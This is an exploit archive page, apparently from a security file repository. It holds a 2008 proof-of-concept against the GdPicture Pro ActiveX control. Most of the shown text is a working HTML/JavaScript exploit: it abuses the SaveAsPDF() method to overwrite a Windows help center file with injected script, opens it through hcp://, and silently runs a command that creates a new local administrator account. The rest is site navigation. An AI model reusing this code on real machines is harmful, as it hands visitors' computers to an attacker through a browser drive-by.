gdpicture-exec.txt

gdpicture-exec.txt: Posted Oct 1, 2008; Authored by EgiX; GdPicture Pro ActiveX file overwrite and execution exploit that makes use of gdpicture4s.ocx.; tags | exploit, activex; SHA-256 | 1fff701b6ded72f1de5d27cdad225d0ae43db634685b8bad3d357708af30183c; Download | Favorite | View

gdpicture-exec.txt

<!--

  ---------------------------------------------------------------------------------
  GdPicture Pro ActiveX (gdpicture4s.ocx) Remote File Overwrite / Execution Exploit
  ---------------------------------------------------------------------------------
  
  author...: EgiX
  mail.....: n0b0d13s[at]gmail[dot]com
  
  link.....: http://www.gdpicture.com/
  ProgID...: GdPicture4S.Imaging
  
  Description:
  
  SaveAsPDF() method allow to create / overwrite file through
  sFilePath argument. By using other arguments, such as sTitle,
  an attacker could be inject html code and execute it using
  the hcp:// protocol (tecnique discovered by rgod).
  Also GdPicturePro5.Imaging is prone to this vulnerability,
  but it doesn't implements the IObjectSafety interface.
  
  Tested on Windows XP SP2 with IE 6/7
  
  Object safety report:
  
  Report for Clsid: {E8512363-3581-42EF-A43D-990E7935C8BE}
  RegKey Safe for Script: False
  RegKey Safe for Init: False
  Implements IObjectSafety: True
  IDisp Safe:  Safe for untrusted: caller,data  
  IPStorage Safe:  Safe for untrusted: caller,data

  [*] A special thanks goes to shinnai, for his patience :)

-->

<object classid='clsid:E8512363-3581-42EF-A43D-990E7935C8BE' id='test'></object>

<script language='javascript'>

  var cmd = "cmd /c net user test test /add & net localgroup Administrators test /add";

  var outFile = "c:\\windows\\pchealth\\helpctr\\system\\errors\\badurl.htm";

  var BMP = "\x42\x4d\x42\x00\x00\x00\x00\x00\x00\x00\x3e" +
      "\x00\x00\x00\x28\x00\x00\x00\x01\x00\x00\x00" +
      "\x01\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00" +
      "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
      "\x00\x00\x00\xff\xff\xff\x00\x80\x00\x00\x00";

  var sc = "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='wsh'><\/object>" +
     "<script language='vbscript'>wsh.Run \"" + cmd + "\", SW_HIDE<\/script>";

  test.SetLicenseNumber("0317955669879948884162456"); // only to avoid the nag screen
  test.CreateImageFromString(BMP);

  if (test.SaveAsPDF(outFile, sc, "", "", "")) location.href = "hcp://system/errors/badurl.htm";

</script>

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

gdpicture-exec.txt

gdpicture-exec.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

gdpicture-exec.txt

Share This

gdpicture-exec.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems